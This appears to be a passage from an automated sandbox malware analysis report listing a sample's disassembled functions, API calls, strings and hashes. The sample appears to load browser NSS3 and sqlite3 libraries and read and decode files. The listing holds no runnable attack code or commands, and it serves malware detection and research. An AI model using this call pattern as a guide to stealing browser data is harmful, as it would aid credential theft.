                                                                                                                                                                                                                                              • PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C356C96
                                                                                                                                                                                                                                                • Part of subcall function 6C301240: TlsGetValue.KERNEL32(00000040,?,6C30116C,NSPR_LOG_MODULES), ref: 6C301267
                                                                                                                                                                                                                                                • Part of subcall function 6C301240: EnterCriticalSection.KERNEL32(?,?,?,6C30116C,NSPR_LOG_MODULES), ref: 6C30127C
                                                                                                                                                                                                                                                • Part of subcall function 6C301240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C30116C,NSPR_LOG_MODULES), ref: 6C301291
                                                                                                                                                                                                                                                • Part of subcall function 6C301240: PR_Unlock.NSS3(?,?,?,?,6C30116C,NSPR_LOG_MODULES), ref: 6C3012A0
                                                                                                                                                                                                                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C356CAA
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: strncmp$CriticalEnterSectionSecureUnlockValuegetenvstrcmp
                                                                                                                                                                                                                                              • String ID: NSS_DEFAULT_DB_TYPE$dbm$dbm:$extern:$rdb:$sql:
                                                                                                                                                                                                                                              • API String ID: 4221828374-3736768024
                                                                                                                                                                                                                                              • Opcode ID: 5eecba7208827d291b3e2f4f7a4dbb03d04628634f56f2267be1b000c32e32ad
                                                                                                                                                                                                                                              • Instruction ID: 0168fa5853ec2eec053c45973c47af2e75a2394615db12f1ffff80d60290e10d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5eecba7208827d291b3e2f4f7a4dbb03d04628634f56f2267be1b000c32e32ad
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2801F2E1B4239127FA00777A6E4AF26312C9F4115CF940035FE04E0A82EBAAE53445A5
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00411F4E
                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00411F65
                                                                                                                                                                                                                                                • Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 00411F9C
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,04086790), ref: 00411FBB
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 00411FCF
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,04086508), ref: 00411FE3
                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                • Part of subcall function 00415490: GetFileAttributesA.KERNEL32(00000000,?,0040E9F4,?,00000000,?,00000000,0041D76E,0041D76B), ref: 0041549F
                                                                                                                                                                                                                                                • Part of subcall function 004096C0: StrStrA.SHLWAPI(00000000,04086388), ref: 0040971B
                                                                                                                                                                                                                                                • Part of subcall function 004096C0: memcmp.MSVCRT ref: 00409774
                                                                                                                                                                                                                                                • Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
                                                                                                                                                                                                                                                • Part of subcall function 004093A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
                                                                                                                                                                                                                                                • Part of subcall function 004093A0: LocalAlloc.KERNEL32(00000040,?), ref: 00409411
                                                                                                                                                                                                                                                • Part of subcall function 004093A0: ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
                                                                                                                                                                                                                                                • Part of subcall function 004093A0: LocalFree.KERNEL32('@), ref: 00409470
                                                                                                                                                                                                                                                • Part of subcall function 004093A0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A
                                                                                                                                                                                                                                                • Part of subcall function 00415AC0: GlobalAlloc.KERNEL32(00000000,00412087,00412087), ref: 00415AD3
                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(?,040866D0), ref: 0041209D
                                                                                                                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 00412199
                                                                                                                                                                                                                                                • Part of subcall function 004094A0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 004094CF
                                                                                                                                                                                                                                                • Part of subcall function 004094A0: LocalAlloc.KERNEL32(00000040,?,?,?,00404BAE,00000000,?), ref: 004094E1
                                                                                                                                                                                                                                                • Part of subcall function 004094A0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 0040950A
                                                                                                                                                                                                                                                • Part of subcall function 004094A0: LocalFree.KERNEL32(?,?,?,?,00404BAE,00000000,?), ref: 0040951F
                                                                                                                                                                                                                                                • Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
                                                                                                                                                                                                                                                • Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
                                                                                                                                                                                                                                                • Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0041212A
                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041D4AB,?,?,?,?,000003E8), ref: 00412147
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(00000000,00000000), ref: 00412159
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(00000000,?), ref: 0041216C
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(00000000,0041D840), ref: 0041217B
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: lstrcat$Local$AllocFile$Freememset$BinaryCryptGlobalStringmemcmp$AttributesChangeCloseCreateFindFolderNotificationPathReadSizelstrcpy
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3662689742-0
                                                                                                                                                                                                                                              • Opcode ID: 36c557b0570699eea903d19c98cc913e6d9a782b508e14753a73fb5aa098a747
                                                                                                                                                                                                                                              • Instruction ID: d5c3215e2bd1f08faed5fb03d7604f0585b4cbbeb5c4b7daf79ee1030fe867fa
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 36c557b0570699eea903d19c98cc913e6d9a782b508e14753a73fb5aa098a747
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B97158B6900618BBCB24EBE0DD49FDE7779AF88304F004599F60997181EA78DB94CF94
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: free$Unlock$ErrorValuecallocmallocmemcpystrcpystrlen
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 786543732-0
                                                                                                                                                                                                                                              • Opcode ID: 0e701a2be9db258a392480bb83d06cb0a9acb56f7d82696e9f5bbe5b23aeb583
                                                                                                                                                                                                                                              • Instruction ID: dcedc70a789bab18b972b7ac1d11a2b9fb83aa5c3937e54d22bf7955b1c6331c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0e701a2be9db258a392480bb83d06cb0a9acb56f7d82696e9f5bbe5b23aeb583
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D85190B2F012259BDF01FFA9E855AAE77B8BB06349F140125DC09A7B11D731A944CFE2
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • sqlite3_value_text16.NSS3(?), ref: 6C3E4CAF
                                                                                                                                                                                                                                              • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C3E4CFD
                                                                                                                                                                                                                                              • sqlite3_value_text16.NSS3(?), ref: 6C3E4D44
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: sqlite3_value_text16$sqlite3_log
                                                                                                                                                                                                                                              • String ID: API call with %s database connection pointer$abort due to ROLLBACK$another row available$bad parameter or other API misuse$invalid$no more rows available$out of memory$unknown error
                                                                                                                                                                                                                                              • API String ID: 2274617401-4033235608
                                                                                                                                                                                                                                              • Opcode ID: b12f803651b617c724109fdca0c79c8b1ea67598f210d7c51c09c445a244af79
                                                                                                                                                                                                                                              • Instruction ID: f768353469d90895160624a1ff9db89daa79e1929892a6187d6c687c869a73a8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b12f803651b617c724109fdca0c79c8b1ea67598f210d7c51c09c445a244af79
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 59317CB3E04870B7E704A6A4A801FE6B375BB8E71CF554127D42547E15DB26BC128FE2
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • PR_LogPrint.NSS3(C_InitToken), ref: 6C342CEC
                                                                                                                                                                                                                                              • PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6C342D07
                                                                                                                                                                                                                                                • Part of subcall function 6C4209D0: PR_Now.NSS3 ref: 6C420A22
                                                                                                                                                                                                                                                • Part of subcall function 6C4209D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C420A35
                                                                                                                                                                                                                                                • Part of subcall function 6C4209D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C420A66
                                                                                                                                                                                                                                                • Part of subcall function 6C4209D0: PR_GetCurrentThread.NSS3 ref: 6C420A70
                                                                                                                                                                                                                                                • Part of subcall function 6C4209D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C420A9D
                                                                                                                                                                                                                                                • Part of subcall function 6C4209D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C420AC8
                                                                                                                                                                                                                                                • Part of subcall function 6C4209D0: PR_vsmprintf.NSS3(?,?), ref: 6C420AE8
                                                                                                                                                                                                                                                • Part of subcall function 6C4209D0: EnterCriticalSection.KERNEL32(?), ref: 6C420B19
                                                                                                                                                                                                                                                • Part of subcall function 6C4209D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C420B48
                                                                                                                                                                                                                                                • Part of subcall function 6C4209D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C420C76
                                                                                                                                                                                                                                                • Part of subcall function 6C4209D0: PR_LogFlush.NSS3 ref: 6C420C7E
                                                                                                                                                                                                                                              • PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6C342D22
                                                                                                                                                                                                                                                • Part of subcall function 6C4209D0: OutputDebugStringA.KERNEL32(?), ref: 6C420B88
                                                                                                                                                                                                                                                • Part of subcall function 6C4209D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C420C5D
                                                                                                                                                                                                                                                • Part of subcall function 6C4209D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6C420C8D
                                                                                                                                                                                                                                                • Part of subcall function 6C4209D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C420C9C
                                                                                                                                                                                                                                                • Part of subcall function 6C4209D0: OutputDebugStringA.KERNEL32(?), ref: 6C420CD1
                                                                                                                                                                                                                                                • Part of subcall function 6C4209D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C420CEC
                                                                                                                                                                                                                                                • Part of subcall function 6C4209D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C420CFB
                                                                                                                                                                                                                                                • Part of subcall function 6C4209D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C420D16
                                                                                                                                                                                                                                                • Part of subcall function 6C4209D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6C420D26
                                                                                                                                                                                                                                                • Part of subcall function 6C4209D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C420D35
                                                                                                                                                                                                                                                • Part of subcall function 6C4209D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6C420D65
                                                                                                                                                                                                                                                • Part of subcall function 6C4209D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6C420D70
                                                                                                                                                                                                                                                • Part of subcall function 6C4209D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C420D90
                                                                                                                                                                                                                                                • Part of subcall function 6C4209D0: free.MOZGLUE(00000000), ref: 6C420D99
                                                                                                                                                                                                                                              • PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6C342D3B
                                                                                                                                                                                                                                                • Part of subcall function 6C4209D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C420BAB
                                                                                                                                                                                                                                                • Part of subcall function 6C4209D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C420BBA
                                                                                                                                                                                                                                                • Part of subcall function 6C4209D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C420D7E
                                                                                                                                                                                                                                              • PR_LogPrint.NSS3( pLabel = 0x%p,?), ref: 6C342D54
                                                                                                                                                                                                                                                • Part of subcall function 6C4209D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C420BCB
                                                                                                                                                                                                                                                • Part of subcall function 6C4209D0: EnterCriticalSection.KERNEL32(?), ref: 6C420BDE
                                                                                                                                                                                                                                                • Part of subcall function 6C4209D0: OutputDebugStringA.KERNEL32(?), ref: 6C420C16
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: DebugOutputString$Printfflush$fwrite$CriticalEnterR_snprintfSection$CurrentExplodeFlushR_vsmprintfR_vsnprintfThreadTimefputcfreememcpystrlen
                                                                                                                                                                                                                                              • String ID: pLabel = 0x%p$ pPin = 0x%p$ slotID = 0x%x$ ulPinLen = %d$C_InitToken$nBl
                                                                                                                                                                                                                                              • API String ID: 420000887-2769900274
                                                                                                                                                                                                                                              • Opcode ID: e33c1274704451548ff1b12490b3bb45297a574d09789055d7abdd07497716b7
                                                                                                                                                                                                                                              • Instruction ID: d20afa77a53f3f323e098c1077638761d46988d06f1d0252cdd22a62d52a2923
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e33c1274704451548ff1b12490b3bb45297a574d09789055d7abdd07497716b7
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 44218C756011A4EFDB11FB54DE8CE493BF5EB8622DF048024E518E6622DB328848DFB2
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6C2B24BA
                                                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 6C2B250D
                                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6C2B2554
                                                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 6C2B25A7
                                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6C2B2609
                                                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 6C2B265F
                                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6C2B26A2
                                                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 6C2B26F5
                                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6C2B2764
                                                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 6C2B2898
                                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6C2B28D0
                                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6C2B2948
                                                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 6C2B299B
                                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6C2B29E2
                                                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 6C2B2A31
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CriticalSection$Enter$Leave
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2801635615-0
                                                                                                                                                                                                                                              • Opcode ID: 6647e6d3fff453abf3464fd3cb63a73efcd00ca9d0bbb05e38dd65fd096405cc
                                                                                                                                                                                                                                              • Instruction ID: 2b6098571126deb46975eafddbf84f3dbca1ad7e656ab39c8e9d4b2751a62c95
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6647e6d3fff453abf3464fd3cb63a73efcd00ca9d0bbb05e38dd65fd096405cc
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A3F1C371A01725CBDF09FF21D99DA7A3370BF0B359B180129ED466BA15CB359841CBA2
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • sqlite3_initialize.NSS3 ref: 6C3E2D9F
                                                                                                                                                                                                                                                • Part of subcall function 6C29CA30: EnterCriticalSection.KERNEL32(?,?,?,6C2FF9C9,?,6C2FF4DA,6C2FF9C9,?,?,6C2C369A), ref: 6C29CA7A
                                                                                                                                                                                                                                                • Part of subcall function 6C29CA30: LeaveCriticalSection.KERNEL32(?), ref: 6C29CB26
                                                                                                                                                                                                                                              • sqlite3_exec.NSS3(?,?,6C3E2F70,?,?), ref: 6C3E2DF9
                                                                                                                                                                                                                                              • sqlite3_free.NSS3(00000000), ref: 6C3E2E2C
                                                                                                                                                                                                                                              • sqlite3_free.NSS3(?), ref: 6C3E2E3A
                                                                                                                                                                                                                                              • sqlite3_free.NSS3(?), ref: 6C3E2E52
                                                                                                                                                                                                                                              • sqlite3_mprintf.NSS3(6C44AAF9,?), ref: 6C3E2E62
                                                                                                                                                                                                                                              • sqlite3_free.NSS3(?), ref: 6C3E2E70
                                                                                                                                                                                                                                              • sqlite3_free.NSS3(?), ref: 6C3E2E89
                                                                                                                                                                                                                                              • sqlite3_free.NSS3(?), ref: 6C3E2EBB
                                                                                                                                                                                                                                              • sqlite3_free.NSS3(?), ref: 6C3E2ECB
                                                                                                                                                                                                                                              • sqlite3_free.NSS3(00000000), ref: 6C3E2F3E
                                                                                                                                                                                                                                              • sqlite3_free.NSS3(?), ref: 6C3E2F4C
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: sqlite3_free$CriticalSection$EnterLeavesqlite3_execsqlite3_initializesqlite3_mprintf
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1957633107-0
                                                                                                                                                                                                                                              • Opcode ID: ed7d28050d3b73eed192b964b44c852ad41345c4c9578e12bed6a30b6425535b
                                                                                                                                                                                                                                              • Instruction ID: abd24c48a744858f362611f1b9ae802f1ca787848d8227cb61f783b0c7be8628
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ed7d28050d3b73eed192b964b44c852ad41345c4c9578e12bed6a30b6425535b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 286191B5E0022A8BEB00CFA5D985BDEB7B5AF88348F144025ED55A7700E732E855CFA1
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • TlsGetValue.KERNEL32(?,?,?,6C293921,6C4714E4,6C3DCC70), ref: 6C294C97
                                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,6C293921,6C4714E4,6C3DCC70), ref: 6C294CB0
                                                                                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,?,6C293921,6C4714E4,6C3DCC70), ref: 6C294CC9
                                                                                                                                                                                                                                              • TlsGetValue.KERNEL32(?,?,?,?,?,6C293921,6C4714E4,6C3DCC70), ref: 6C294D11
                                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6C293921,6C4714E4,6C3DCC70), ref: 6C294D2A
                                                                                                                                                                                                                                              • PR_NotifyAllCondVar.NSS3(?,?,?,?,?,?,?,6C293921,6C4714E4,6C3DCC70), ref: 6C294D4A
                                                                                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,?,?,?,6C293921,6C4714E4,6C3DCC70), ref: 6C294D57
                                                                                                                                                                                                                                              • PR_GetCurrentThread.NSS3(?,?,?,?,?,6C293921,6C4714E4,6C3DCC70), ref: 6C294D97
                                                                                                                                                                                                                                              • PR_Lock.NSS3(?,?,?,?,?,6C293921,6C4714E4,6C3DCC70), ref: 6C294DBA
                                                                                                                                                                                                                                              • PR_WaitCondVar.NSS3 ref: 6C294DD4
                                                                                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,?,6C293921,6C4714E4,6C3DCC70), ref: 6C294DE6
                                                                                                                                                                                                                                              • PR_GetCurrentThread.NSS3(?,?,?,?,?,6C293921,6C4714E4,6C3DCC70), ref: 6C294DEF
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
